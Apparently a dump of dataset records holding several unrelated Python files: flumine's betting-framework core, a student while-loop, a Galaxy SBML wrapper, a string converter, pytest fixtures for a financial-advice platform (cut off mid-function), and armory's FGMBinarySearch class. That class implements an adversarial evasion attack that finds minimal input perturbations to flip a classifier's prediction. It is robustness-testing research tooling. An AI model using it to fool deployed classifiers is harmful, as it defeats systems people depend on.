self.log_control, self._add_market\n )\n for market in self.markets:\n if market.closed is False and market.blotter.active:\n for strategy in self.strategies:\n strategy_orders = market.blotter.strategy_orders(strategy)\n if strategy_orders:\n utils.call_process_orders_error_handling(\n strategy, market, strategy_orders\n )\n\n def _process_custom_event(self, event: events.CustomEvent) -> None:\n try:\n event.callback(self, event)\n except FlumineException as e:\n logger.error(\n \"FlumineException error %s in _process_custom_event %s\",\n e,\n event.callback,\n exc_info=True,\n )\n except Exception as e:\n logger.exception(\n \"Unknown error %s in _process_custom_event %s\",\n e,\n event.callback,\n exc_info=True,\n )\n if config.raise_errors:\n raise\n\n def _process_close_market(self, event: events.CloseMarketEvent) -> None:\n market_book = event.event\n if isinstance(market_book, dict):\n recorder = True\n market_id = market_book[\"id\"]\n stream_id = market_book[\"_stream_id\"]\n else:\n recorder = False\n market_id = market_book.market_id\n stream_id = market_book.streaming_unique_id\n market = self.markets.markets.get(market_id)\n if market is None:\n logger.warning(\n \"Market %s not present when closing\",\n market_id,\n extra={\"market_id\": market_id, **self.info},\n )\n return\n # process market\n if market.closed is False:\n market.close_market()\n if recorder is False:\n market(market_book)\n market.blotter.process_closed_market(event.event)\n\n for strategy in self.strategies:\n if stream_id in strategy.stream_ids:\n strategy.process_closed_market(market, event.event)\n\n if recorder is False and self.clients.simulated:\n # simulate ClearedOrdersEvent\n cleared_orders = resources.ClearedOrders(\n moreAvailable=False, clearedOrders=[]\n )\n cleared_orders.market_id = market_id\n self._process_cleared_orders(events.ClearedOrdersEvent(cleared_orders))\n for client in self.clients:\n # simulate ClearedMarketsEvent\n cleared_markets = resources.ClearedOrders(\n moreAvailable=False,\n clearedOrders=[market.cleared(client)],\n )\n self._process_cleared_markets(\n events.ClearedMarketsEvent(cleared_markets)\n )\n self.log_control(event)\n logger.info(\"Market closed\", extra={\"market_id\": market_id, **self.info})\n\n # check for markets that have been closed for x seconds and remove\n if not self.clients.simulated:\n # due to monkey patching this will clear simulated markets\n closed_markets = [\n m\n for m in self.markets\n if m.closed\n and m.elapsed_seconds_closed\n and m.elapsed_seconds_closed > 3600\n ]\n for market in closed_markets:\n self._remove_market(market)\n else:\n self._remove_market(market, clear=False)\n\n def _process_cleared_orders(self, event):\n market_id = event.event.market_id\n market = self.markets.markets.get(market_id)\n if market is None:\n logger.warning(\n \"Market %s not present when clearing\" % market_id,\n extra={\"market_id\": market_id, **self.info},\n )\n return\n\n meta_orders = market.blotter.process_cleared_orders(event.event)\n self.log_control(events.ClearedOrdersMetaEvent(meta_orders))\n logger.info(\n \"Market cleared\",\n extra={\n \"market_id\": market_id,\n \"order_count\": len(meta_orders),\n **self.info,\n },\n )\n\n def _process_cleared_markets(self, event: events.ClearedMarketsEvent):\n # todo update blotter?\n for cleared_market in event.event.orders:\n logger.info(\n \"Market level cleared\",\n extra={\n \"market_id\": cleared_market.market_id,\n \"profit\": cleared_market.profit,\n \"bet_count\": cleared_market.bet_count,\n },\n )\n self.log_control(event)\n\n def _process_end_flumine(self) -> None:\n self.strategies.finish(self)\n\n @property\n def info(self) -> dict:\n return {\n \"clients\": self.clients.info,\n \"markets\": {\n \"market_count\": len(self.markets),\n \"open_market_count\": len(self.markets.open_market_ids),\n },\n \"streams\": [s for s in self.streams],\n \"logging_controls\": self._logging_controls,\n \"threads\": threading.enumerate(),\n }\n\n def __enter__(self):\n logger.info(\"Starting flumine\", extra=self.info)\n if len(self.clients) == 0:\n raise ClientError(\"No clients provided\")\n # simulated\n if self.SIMULATED:\n config.simulated = True\n else:\n config.simulated = False\n # login\n self.clients.login()\n self.clients.update_account_details()\n # add default and start all workers\n self._add_default_workers()\n for w in self._workers:\n w.start()\n # start logging controls\n for c in self._logging_controls:\n c.start()\n # process config (logging)\n self.log_control(events.ConfigEvent(config))\n # start strategies\n self.strategies.start(self)\n # start streams\n self.streams.start()\n\n self._running = True\n\n def __exit__(self, *args):\n # shutdown framework\n self._process_end_flumine()\n # shutdown workers\n for w in self._workers:\n w.shutdown()\n # shutdown streams\n self.streams.stop()\n # shutdown thread pools\n self.simulated_execution.shutdown()\n self.betfair_execution.shutdown()\n # shutdown logging controls\n self.log_control(events.TerminationEvent(self))\n for c in self._logging_controls:\n if c.is_alive():\n c.join()\n # logout\n self.clients.logout()\n self._running = False\n logger.info(\"Exiting flumine\", extra=self.info)\n","repo_name":"betcode-org/flumine","sub_path":"flumine/baseflumine.py","file_name":"baseflumine.py","file_ext":"py","file_size_in_byte":17656,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"31"} +{"seq_id":"32936293334","text":"qs = [\"What is your name?\", \"What is your age?\" , \n\"What is your height?\" , \n\"What is your gender?\"]\nn=0\nwhile True:\n print(\"Type q to quit\")\n a=input(qs[n])\n if a == \"q\":\n break\n n = (n+1) % 3 #This expression here works a bit different. 1. When n=0 it will give 0 cause (n+1) is less than 3.\n#mathematically i know the answer should be different but this is programming think in terms of 0 and 1.\n#2. When n=1, n+1=2, it is still less than 3 so we will get 2. \n#3. When n=2, n+1=3, so we finally get 0. and the loop runs again.\n\n# You can change the value of n as you need.","repo_name":"NakshatraCosmo/Projects","sub_path":"while1.py","file_name":"while1.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37489021672","text":"#!/usr/bin/env python3\n\"\"\"\nCreated on September 21 2019\n\n@author: Melchior du Lac\n@description: Galaxy script to query rpReader REST service\n\n\"\"\"\nimport sys\nsys.path.insert(0, '/home/')\nimport argparse\nimport logging\nimport os\nimport rpToolServe\n\n##\n#\n#\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser('Python wrapper to merge two SBML files together. The source and target refers to the species and reactions that will be overwritten where the source species will be read first and not overwritten if that species already exists in the target SBML')\n parser.add_argument('-sourcefile', type=str)\n parser.add_argument('-inout_format', type=str, choices=['tar', 'sbml'], default='tar')\n parser.add_argument('-target_sbml', type=str)\n parser.add_argument('-output', type=str)\n params = parser.parse_args()\n rpToolServe.main(params.sourcefile,\n params.inout_format,\n params.target_sbml,\n params.output)\n","repo_name":"galaxy-synbiocad/rpMergeSBML","sub_path":"galaxy/code/tool_rpMergeSBML.py","file_name":"tool_rpMergeSBML.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34326851259","text":"\"\"\"\nUpdated version of art.attacks.fast_gradient.py\n\nUses binary search to quickly find optimal epsilon values per test point\n\"\"\"\n\nfrom art.attacks.evasion import FastGradientMethod\nimport numpy as np\n\n\nclass FGMBinarySearch(FastGradientMethod):\n \"\"\"\n Find minimum epsilon perturbations for the given inputs\n\n Uses binary search, up to given tolerance.\n\n Uses self.eps for the maximum value to consider when searching\n Uses self.eps_step for the tolerance for result granularity\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.set_params(minimal=True)\n\n def _minimal_perturbation_binary_batch(self, batch, batch_labels, adv_batch=None):\n \"\"\"\n Iteratively compute the minimal perturbation necessary to make the\n class prediction change, using binary search.\n\n batch - np array of features for batch (x)\n batch_labels - np array of labels for batch, a 2D array of probabilites (y)\n adv_batch - same shape as batch (x^hat)\n This method returns the adv_batch that is computed for the given x and y\n If adv_batch is None, it creates a new array to return\n Else, it modifies the existing array that is passed in\n\n Returns - computed adv_batch\n \"\"\"\n if adv_batch is None:\n adv_batch = batch.copy()\n batch_classes = np.argmax(batch_labels, axis=1)\n\n # Get perturbation\n mask = None\n perturbation = self._compute_perturbation(batch, batch_labels, mask)\n\n def check_epsilon(i, epsilon):\n adv_batch = self._apply_perturbation(batch[[i]], perturbation[[i]], epsilon)\n adv_pred = self.estimator.predict(adv_batch)\n adv_class = np.argmax(adv_pred, axis=1)\n if self.targeted:\n success = batch_classes[[i]] == adv_class\n else:\n success = batch_classes[[i]] != adv_class\n return success, adv_batch\n\n tolerance = self.eps_step\n for i in range(len(batch)):\n # Assume endpoints are correct\n min_eps = 0\n max_eps = self.eps\n while max_eps - min_eps > tolerance:\n mid_eps = (max_eps + min_eps) / 2\n # print(min_eps, mid_eps, max_eps, tolerance)\n\n success, adv_i = check_epsilon(i, mid_eps)\n if success:\n adv_batch[[i]] = adv_i\n max_eps = mid_eps\n else:\n min_eps = mid_eps\n\n return adv_batch\n\n def _minimal_perturbation_linear_batch(self, batch, batch_labels, adv_batch=None):\n \"\"\"\n Rewrite of inner loop for linear search\n\n batch - np array of features for batch (x)\n batch_labels - np array of labels for batch, a 2D array of probabilites (y)\n adv_batch - same shape as batch (x^hat)\n This method returns the adv_batch that is computed for the given x and y\n If adv_batch is None, it creates a new array to return\n Else, it modifies the existing array that is passed in\n\n Returns - computed adv_batch\n \"\"\"\n if adv_batch is None:\n adv_batch = batch.copy()\n batch_classes = np.argmax(batch_labels, axis=1)\n adv_classes = batch_classes.copy()\n\n # Get perturbation\n perturbation = self._compute_perturbation(batch, batch_labels)\n\n # Get current predictions\n active = np.arange(len(batch))\n current_eps = self.eps_step\n while active.size > 0 and current_eps <= self.eps:\n # Adversarial crafting\n adv_batch[active] = self._apply_perturbation(\n batch[active],\n perturbation[active],\n current_eps,\n )\n\n # Check for success\n adv_preds = self.estimator.predict(adv_batch[active])\n # adv_preds = self.estimator.predict(adv_batch) # can we pare this down?\n adv_classes[active] = np.argmax(adv_preds, axis=1)\n # If targeted active check to see whether we have hit the target\n if self.targeted:\n active = np.where(batch_classes != adv_classes)[0]\n else:\n active = np.where(batch_classes == adv_classes)[0]\n current_eps += self.eps_step\n\n return adv_batch\n\n def _minimal_perturbation(self, x, y, mask) -> np.ndarray:\n \"\"\"\n Iteratively compute the minimal perturbation necessary to make the\n class prediction change, using binary search.\n \"\"\"\n if mask is not None:\n raise NotImplementedError(\"non-None mask not implemented\")\n adv_x = x.copy()\n\n # Compute perturbation with implicit batching\n for start in range(0, adv_x.shape[0], self.batch_size):\n end = start + self.batch_size\n self._minimal_perturbation_binary_batch(\n x[start:end],\n y[start:end],\n adv_x[start:end],\n )\n\n return adv_x\n","repo_name":"twosixlabs/armory","sub_path":"armory/art_experimental/attacks/fgm_binary_search.py","file_name":"fgm_binary_search.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"31"} +{"seq_id":"7509972177","text":"\"\"\"\nStudent name : Anurag Pareek\nUniversity roll no. : 2215000322\nContact : anurag020416@gmail.com\nPerpose : Python program to convert snake case to pascal case\n\"\"\"\n\nstring = input(\"Enter in snake_case : \").split(\"_\")\nfor i in range(len(string)):\n string[i] = string[i].title()\nstring = \"\".join(string)\nprint(string)","repo_name":"krsna016/vacation-pywork","sub_path":"036_snake_pascal_conv.py","file_name":"036_snake_pascal_conv.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8664286231","text":"import pytest\nfrom api import leads, fees, clients_documents\nfrom api import clients\nfrom api import relationships\nfrom api import plans\nfrom api import workflow\nfrom api import contributions\nfrom api import withdrawals\nfrom api import valuations\nfrom api import holdings\nfrom api import quotes\nfrom api import securemessaging\nfrom api import leads_documents\nfrom api import tags\nfrom api import client_dependants\nfrom api import factfind\nfrom api import tasks\nfrom api import imps\nfrom api import models\nfrom dsl.fee_actions import FeeActions\nfrom dsl.lead_activities import AddLeadTask\nfrom dsl.provider_statement import ElectronicImports, ProviderStatement\nfrom dsl.search import SearchPlan, SearchFee, SearchClient\nfrom dsl.plan_actions import PlanActions\nfrom dsl.set_up_needs_and_priorities_questions import *\nfrom dsl.set_up_user_delegation import *\nfrom dsl.cash_receipts import CashReceipts\nfrom dsl.client_activities import ClientActivities\nfrom api.published_apps import *\nfrom dsl.generate_document import GenerateDocument\nfrom dsl.login_to_pfp import LogIn as PFPLogin\nfrom dsl.upload_document import ClientDocuments\nfrom dsl.get_client_quote import GetClientQuote\nfrom dsl.client_opportunities import ClientOpportunities\nfrom dsl.client_service_case import ClientServiceCase\nfrom dsl.advice_planning import PlanningOpportunities\nfrom dsl.rebalance import StartRebalanceCommunication\nfrom dsl.pfp_recommendations import AcceptRecommendation\nimport fakedata\nfrom datetime import datetime\n\n\n# \nfrom dsl.user_tasks import UserTasks\nfrom ioffice.income.statement_search import StatementSearchPage\n\n\n@pytest.fixture\ndef api_create_client(config):\n client = clients.create_client(config)\n utils.add_temp_data(config, \"client\", client)\n\n\n@pytest.fixture\ndef api_search_default_client_and_save_details(config):\n client_details = clients.search_client(config, get_common_data(config)[\"clients\"][\"default\"][\"lastname\"])\n utils.add_temp_data(config, \"client\", {\"id\": client_details[\"items\"][0][\"partyId\"],\n \"name\": client_details[\"items\"][0][\"party\"][\"name\"]})\n config.access_token = None\n\n\n@pytest.fixture\ndef api_search_pfp_imps_client_and_save_details(config):\n client_details = clients.search_client(config, get_common_data(config)[\"clients\"][\"pfp_imps_client\"][\"lastname\"])\n utils.add_temp_data(config, \"client\", {\"id\": client_details[\"items\"][0][\"partyId\"],\n \"name\": client_details[\"items\"][0][\"party\"][\"name\"]})\n config.access_token = None\n\n\n@pytest.fixture\ndef api_create_lead(config):\n lead = leads.create_lead(config)\n utils.add_temp_data(config, \"lead\", lead)\n\n\n@pytest.fixture\ndef api_delete_lead(config):\n yield\n leads.delete_lead(config, utils.get_temp_data(config, \"lead\")['id'])\n\n\n@pytest.fixture\ndef api_add_lead_address(config):\n lead = get_temp_data(config, \"lead\")\n address = leads.add_address_for_lead(config, lead[\"id\"])\n utils.add_temp_data(config, \"address\", address)\n\n\n@pytest.fixture\ndef api_add_client_address(config):\n client = get_temp_data(config, \"client\")\n address = clients.add_address_for_client(config, client[\"id\"])\n utils.add_temp_data(config, \"address\", address)\n\n\n@pytest.fixture\ndef api_create_client_relationship(config):\n client_list = get_temp_data_collection(config, \"client\")\n client_relationship = relationships.create_relationships_for_client(config, client_list[0][\"id\"], client_list[1][\"id\"])\n add_temp_data(config, \"client_relationship\", client_relationship)\n\n\n@pytest.fixture\ndef api_create_employee_relationship(config):\n client_list = get_temp_data_collection(config, \"client\")\n client_relationship = relationships.create_relationships_for_client(config, client_list[0][\"id\"], client_list[1][\"id\"],\n \"Employee\")\n add_temp_data(config, \"client_relationship\", client_relationship)\n\n\n@pytest.fixture\ndef api_create_corporate_client(config):\n client = clients.create_corporate_client(config)\n add_temp_data(config, \"client\", client)\n\n\n@pytest.fixture\ndef api_create_client_fee(config):\n client = get_temp_data(config, \"client\")\n fee = fees.create_fee_for_client(config, client[\"id\"])\n utils.add_temp_data(config, \"fee\", fee)\n\n\n@pytest.fixture\ndef api_install_uninstall_app(config):\n install_app(config, config.variables[\"environments\"][config.env][\"data\"][\"automation_test_app\"][\"app_id\"])\n yield\n uninstall_app(config, config.variables[\"environments\"][config.env][\"data\"][\"automation_test_app\"][\"app_id\"])\n\n\n@pytest.fixture\ndef api_delete_plan(config):\n yield\n client = get_temp_data(config, \"client\")\n plan = get_temp_data(config, \"plan\")\n plans.change_plan_status_to(config, client[\"id\"], plan[\"id\"], \"Deleted\")\n\n\n@pytest.fixture\ndef api_delete_clients_plans(config):\n yield\n clients_list = utils.get_temp_data_collection(config, \"client\")\n for client in clients_list:\n plans_list = plans.get_plans_for_a_client(config, client[\"id\"])\n for plan in plans_list[\"items\"]:\n plans.change_plan_status_to(config, client[\"id\"], plan[\"id\"], \"Deleted\")\n\n\n@pytest.fixture\ndef api_delete_sub_plan(config):\n yield\n client = get_temp_data(config, \"client\")\n plans.change_plan_status_to(config, client[\"id\"], config.sub_plan_id, \"Deleted\")\n\n\n@pytest.fixture\ndef api_change_plan_status_to_compliance_sign_off(config):\n plan = get_temp_data(config, \"plan\")\n plans.change_plan_status_to(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], \"Compliance Sign off\")\n\n\n@pytest.fixture\ndef api_change_plan_status_to_submitted_to_provider(config):\n plan = get_temp_data(config, \"plan\")\n plans.change_plan_status_to(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], \"Submitted to Provider\")\n\n\n@pytest.fixture\ndef api_delete_workflow(config):\n yield\n workflow.delete_workflow(config, config.workflow_id)\n\n\n@pytest.fixture\ndef api_archive_workflow(config):\n yield\n workflow.change_workflow_status_to(config, config.workflow_id, \"Archived\")\n\n\n@pytest.fixture\ndef api_create_workflow_category(config):\n workflow_category = workflow.create_workflow_category(config)\n utils.add_temp_data(config, \"workflow_category\", workflow_category)\n\n\n@pytest.fixture\ndef api_delete_category(config):\n yield\n workflow_category = get_temp_data(config, \"workflow_category\")\n workflow.delete_category(config, workflow_category[\"templateCategoryId\"])\n\n\n@pytest.fixture\ndef api_delete_plans_contributions(config):\n yield\n client = get_temp_data(config, \"client\")\n contributions_list = utils.get_temp_data_collection(config, \"contribution\")\n for contribution in contributions_list:\n contributions.delete_contribution(config, client[\"id\"], contribution[\"plan\"][\"id\"], contribution[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_plans_withdrawals(config):\n yield\n client = get_temp_data(config, \"client\")\n withdrawals_list = utils.get_temp_data_collection(config, \"withdrawal\")\n for withdrawal in withdrawals_list:\n withdrawals.delete_withdrawal(config, client[\"id\"], withdrawal[\"plan\"][\"id\"], withdrawal[\"id\"])\n\n\n@pytest.fixture\ndef api_create_joint_client(config):\n first_client = clients.create_client(config)\n utils.add_temp_data(config, \"client\", first_client)\n second_client = clients.create_client(config)\n utils.add_temp_data(config, \"client\", second_client)\n client_relationship = relationships.create_relationships_for_client(config, first_client[\"id\"], second_client[\"id\"])\n add_temp_data(config, \"client_relationship\", client_relationship)\n\n\n@pytest.fixture\ndef api_delete_client_relationship(config):\n yield\n client = get_temp_data(config, \"client\")\n client_relationship = get_temp_data(config, \"client_relationship\")\n relationships.delete_relationship_for_client(config, client[\"id\"], client_relationship[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_documents(config):\n yield\n client = get_temp_data(config, \"client\")\n client_documents = clients_documents.get_client_documents(config, client[\"id\"])\n for document in client_documents[\"items\"]:\n clients_documents.delete_client_document(config, client[\"id\"], document[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_lead_documents(config):\n yield\n lead = get_temp_data(config, \"lead\")\n lead_documents = leads_documents.get_leads_documents(config, lead[\"id\"])\n for document in lead_documents[\"items\"]:\n leads_documents.delete_leads_document(config, lead[\"id\"], document[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_lead_relationship(config):\n yield\n lead = get_temp_data(config, \"lead\")\n lead_relationship = get_temp_data(config, \"lead_relationship\")\n relationships.delete_relationship_for_lead(config, lead[\"id\"], lead_relationship[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_second_life_documents(config):\n yield\n client_id_second_life = get_temp_data(config, \"client\", 1)[\"id\"]\n client_documents = clients_documents.get_client_documents(config, client_id_second_life)\n for document in client_documents[\"items\"]:\n clients_documents.delete_client_document(config, client_id_second_life, document[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_plans(config):\n yield\n client = get_temp_data(config, \"client\")\n plans_list = plans.get_plans_for_a_client(config, client[\"id\"])\n for plan in plans_list[\"items\"]:\n plans.change_plan_status_to(config, client[\"id\"], plan[\"id\"], \"Deleted\")\n\n\n@pytest.fixture\ndef api_create_client_quote(config):\n client = get_temp_data(config, \"client\")\n quote = quotes.create_quote(config, client[\"id\"])\n add_temp_data(config, \"quote\", quote)\n\n\n@pytest.fixture\ndef api_set_quote_status_to_complete(config):\n client = get_temp_data(config, \"client\")\n quote = get_temp_data(config, \"quote\")\n quotes.set_quote_status(config, client[\"id\"], quote[\"id\"], \"Complete\")\n\n\n@pytest.fixture\ndef api_create_client_quote_result(config):\n client = get_temp_data(config, \"client\")\n quote = get_temp_data(config, \"quote\")\n quote_result = quotes.create_quote_result(config, client[\"id\"], quote[\"id\"])\n add_temp_data(config, \"quote_result\", quote_result)\n\n\n@pytest.fixture\ndef api_create_client_joint_quote_result(config):\n quote = get_temp_data(config, \"quote\")\n quote_result = quotes.create_quote_result(config, get_temp_data(\n config, \"client\", 0)[\"id\"], quote[\"id\"], get_temp_data(config, \"client\", 1)[\"id\"])\n add_temp_data(config, \"quote_result\", quote_result)\n\n\n@pytest.fixture\ndef api_upload_documents_to_quote(config):\n client = get_temp_data(config, \"client\")\n quote = get_temp_data(config, \"quote\")\n clients_documents.create_client_quote_document(config, client[\"id\"], quote[\"id\"])\n clients_documents.upload_client_document(config.document_location, open(utils.get_test_documents_file_url(\n \"Test Automation Quote Document.pdf\"),'rb'))\n return config\n\n\n@pytest.fixture\ndef api_upload_documents_to_quote_result(config):\n client = get_temp_data(config, \"client\")\n quote_result = get_temp_data(config, \"quote_result\")\n clients_documents.create_client_quote_result_document(config, client[\"id\"], quote_result[\"id\"])\n clients_documents.upload_client_document(config.document_location, open(\n utils.get_test_documents_file_url(\"Test Automation Quote Result Document.pdf\"), 'rb'))\n\n\n@pytest.fixture\ndef api_upload_quote_documents_to_joint_client(config):\n clients_documents.create_client_quote_document(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"quote\")\n [\"id\"])\n clients_documents.create_client_quote_document(config, get_temp_data(config, \"client\", 1)[\"id\"], get_temp_data(config,\n \"quote\")[\"id\"])\n\n\n@pytest.fixture\ndef api_upload_quote_result_documents_to_joint_client(config):\n clients_documents.create_client_quote_result_document(config, get_temp_data(config, \"client\")[\"id\"],\n get_temp_data(config, \"quote_result\")[\"id\"])\n clients_documents.create_client_quote_result_document(config, get_temp_data(config, \"client\", 1)[\"id\"],\n get_temp_data(config, \"quote_result\")[\"id\"])\n return config\n\n\n@pytest.fixture\ndef api_upload_client_document(config):\n clients_documents.create_client_document(config, get_temp_data(config, \"client\")[\"id\"])\n clients_documents.upload_client_document(config.document_location,\n open(utils.get_test_documents_file_url(\"UploadDocument.pdf\"), 'rb'))\n\n\n@pytest.fixture\ndef api_create_pre_existing_wrap_plan(config):\n config.plan_wrap = {\"policyNumber\": fakedata.rand_int(5), \"startsOn\": datetime.now().strftime(\"%Y-%m-%d\"),\n \"planType\": {\"name\": \"Wrap\"}}\n plan = plans.create_plan(config, get_temp_data(config, \"client\")[\"id\"], \"pension\", True, config.plan_wrap)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_pre_existing_pension_plan(config):\n config.plan = {\"policyNumber\": fakedata.rand_int(5)}\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"pension\", True, config.plan)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_mortgage_plan(config):\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"mortgage\")\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_investment_plan(config):\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"investment\")\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_sipp_plan(config):\n config.plan = {\"planType\": {\"name\": \"SIPP\"}}\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"pension\", False, config.plan)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_pre_existing_investment_plan(config):\n config.plan = {\"policyNumber\": fakedata.rand_int(5)}\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"investment\", True, config.plan)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_pre_existing_investment_plan_for_all_clients(config):\n clients_list = get_temp_data_collection(config, \"client\")\n for client in clients_list:\n plan = plans.create_plan(config, client[\"id\"], \"investment\", True, {\"policyNumber\": fakedata.rand_int(5)})\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_contribution(config):\n plan = get_temp_data(config, \"plan\")\n contribution = contributions.create_contribution(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"contribution\", contribution)\n\n\n@pytest.fixture\ndef api_create_withdrawal(config):\n plan = get_temp_data(config, \"plan\")\n withdrawal = withdrawals.create_withdrawal(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"withdrawal\", withdrawal)\n\n\n@pytest.fixture\ndef api_create_valuation_for_client_plans(config):\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n valuation = valuations.create_valuation(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], fakedata.rand_int(4))\n utils.add_temp_data(config, \"valuation\", valuation)\n\n\n@pytest.fixture\ndef api_create_fund(config):\n plan = get_temp_data(config, \"plan\")\n fund_holding = holdings.create_fund_holding(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"fund_holding\", fund_holding)\n\n\n@pytest.fixture\ndef api_create_fund_for_all_plans(config):\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n fund_holding = holdings.create_fund_holding(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"fund_holding\", fund_holding)\n\n\n@pytest.fixture\ndef api_create_fund_for_sub_plan(config):\n plan = get_temp_data(config, \"plan\", 1)\n fund_holding = holdings.create_fund_holding(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"fund_holding\", fund_holding)\n\n\n@pytest.fixture\ndef api_create_joint_client_quote(config):\n first_life = clients.create_client(config)\n utils.add_temp_data(config, \"client\", first_life)\n second_life = clients.create_client(config)\n utils.add_temp_data(config, \"client\", second_life)\n client_relationship = relationships.create_relationships_for_client(config, first_life[\"id\"], second_life[\"id\"])\n add_temp_data(config, \"client_relationship\", client_relationship)\n quote = quotes.create_quote(config, first_life[\"id\"])\n utils.add_temp_data(config, \"quote\", quote)\n quotes.add_second_life_to_quote(config, second_life[\"id\"], quote[\"id\"])\n\n\n@pytest.fixture\ndef api_send_secure_message(config):\n secure_message = securemessaging.create_secure_message(config)\n add_temp_data(config, \"secure_message\", secure_message)\n securemessaging.send_secure_message(config, secure_message[\"messageId\"])\n\n\n@pytest.fixture\ndef api_delete_client_tag(config):\n yield\n tags.delete_tag_for_client(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"tag\")[\"tag\"])\n\n\n@pytest.fixture\ndef api_add_delete_client_goal(config):\n goal = factfind.create_client_goal(config, get_temp_data(config, \"client\")[\"id\"])\n utils.add_temp_data(config, \"goal\", goal)\n yield\n factfind.delete_client_goal(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"goal\")[\"goalId\"])\n\n\n@pytest.fixture\ndef api_create_task(config):\n client = get_temp_data(config, \"client\")\n task = tasks.create_task(config, client[\"id\"])\n utils.add_temp_data(config, \"task\", task)\n\n\n@pytest.fixture\ndef api_delete_client_address(config):\n yield\n client_address = clients.get_addresses_for_client(config, get_temp_data(config, \"client\")[\"id\"])\n update_temp_data(config, \"client\", 0, \"client_address\", client_address)\n clients.delete_address_for_client(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"client\")[\"client_address\"][\"items\"][0][\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_employment(config):\n yield\n client_employment = clients.get_employment_for_client(config, get_temp_data(config, \"client\")[\"id\"])\n update_temp_data(config, \"client\", 0, \"client_employment\", client_employment)\n clients.delete_employment_for_client(config, get_temp_data(config, \"client\")[\"id\"], client_employment['items'][0][\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_contact(config):\n yield\n client_contact = clients.get_contacts_for_client(config, get_temp_data(config, \"client\")[\"id\"])\n update_temp_data(config, \"client\", 0, \"client_contacts\", client_contact)\n clients.delete_contact_for_client(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"client\")[\"client_contacts\"][\"items\"][0][\"id\"])\n\n\n@pytest.fixture\ndef api_add_client_contact(config):\n contact = clients.add_contact_for_client(config, get_temp_data(config, \"client\")[\"id\"], \"Mobile\")\n utils.add_temp_data(config, \"client_contacts\", contact)\n\n\n@pytest.fixture\ndef api_delete_fund_proposal_for_all_plans(config):\n yield\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n holdings.delete_fundproposal_for_plan(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n\n\n@pytest.fixture\ndef api_create_active_imps_model(config):\n imps_model = imps.create_model_portfolio(config)\n utils.add_temp_data(config, \"imps_model\", imps_model)\n imps.accept_model_portfolio(config, imps_model[\"id\"])\n\n\n@pytest.fixture\ndef api_add_imps_model_to_fund_proposal_for_all_plans(config):\n imps_models = models.get_portfolio_models(config)[\"items\"]\n active_imps_model = utils.find_active_model_by_code(imps_models, utils.get_temp_data(config, \"imps_model\")[\"code\"])\n utils.add_temp_data(config, \"portfolio_model\", active_imps_model)\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n fund_proposal = holdings.add_model_to_plan_fundproposal(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], active_imps_model[\"id\"])\n add_temp_data(config, \"fund_proposal\", fund_proposal)\n\n\n@pytest.fixture\ndef api_deactivate_portfolio_model(config):\n yield\n models.deactivate_portfolio_model(config, utils.get_temp_data(config, \"portfolio_model\")[\"id\"])\n\n# \n\n# \n\n\n@pytest.fixture\ndef ui_delete_fee(config):\n yield\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"change_plan_status_data\"][\"deleted\"])\n\n\n@pytest.fixture\ndef ui_login_logout(config):\n LogIn(config).navigate_to_login_page().login().assert_user_logged_in()\n yield\n 